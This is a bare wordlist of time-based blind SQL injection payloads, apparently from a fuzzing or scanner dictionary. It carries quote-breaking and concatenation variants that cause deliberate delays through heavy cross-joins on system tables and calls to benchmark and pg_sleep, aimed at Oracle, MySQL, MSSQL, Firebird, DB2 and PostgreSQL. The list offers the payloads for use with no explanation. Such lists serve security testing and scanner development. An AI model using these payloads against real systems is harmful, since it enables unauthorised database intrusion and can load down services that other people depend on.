99999999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'99999999
99999999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"99999999
(select benchmark(15000000,md5(0x4e446b6e))-99999999) as test
benchmark(15000000,md5(0x4e446b6e))-99999999
99999999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='99999999
99999999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="99999999
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
99999999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'99999999
99999999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"99999999
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
99999999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'99999999
99999999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"99999999
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
99999999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'99999999
99999999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"99999999
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
99999999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'99999999
99999999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"99999999
(select 9999999999999999 from pg_sleep(10)) as test
(select 9999999999999999 from pg_sleep(10))
99999999'||(select 9999999999999999 from pg_sleep(10))||'99999999
99999999"||(select 9999999999999999 from pg_sleep(10))||"99999999
